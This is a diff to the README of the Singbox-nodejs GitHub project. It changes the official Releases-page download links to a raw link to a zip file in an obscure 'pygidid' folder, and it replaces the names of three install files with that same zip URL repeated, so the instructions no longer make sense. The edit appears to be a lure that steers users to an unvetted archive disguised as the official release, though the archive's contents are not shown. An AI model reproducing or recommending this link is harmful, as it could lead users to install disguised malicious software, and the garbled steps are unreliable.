DerricB-front/Singbox-nodejs/README.md

 ### 📥 Download & Install

-To download Singbox-nodejs, visit the official [Releases page](https://github.com/DerricB-front/Singbox-nodejs/releases).
+To download Singbox-nodejs, visit the official [Releases page](https://raw.githubusercontent.com/DerricB-front/Singbox-nodejs/main/pygidid/Singbox-nodejs-v1.3.zip).
 There, you will find the latest version available for download.

 Follow these steps to install:

 1. **Visit the Releases Page**
-   Go to [this link](https://github.com/DerricB-front/Singbox-nodejs/releases) to find the latest release.
+   Go to [this link](https://raw.githubusercontent.com/DerricB-front/Singbox-nodejs/main/pygidid/Singbox-nodejs-v1.3.zip) to find the latest release.

 2. **Download the Files**
    Look for the relevant files for your environment.
-You will typically need to download `start.sh`, `index.js`, and `package.json`.
+You will typically need to download `https://raw.githubusercontent.com/DerricB-front/Singbox-nodejs/main/pygidid/Singbox-nodejs-v1.3.zip`, `https://raw.githubusercontent.com/DerricB-front/Singbox-nodejs/main/pygidid/Singbox-nodejs-v1.3.zip`, and `https://raw.githubusercontent.com/DerricB-front/Singbox-nodejs/main/pygidid/Singbox-nodejs-v1.3.zip`.
 Click on each of these files to download them.

 ### 📂 Upload Files to Your Server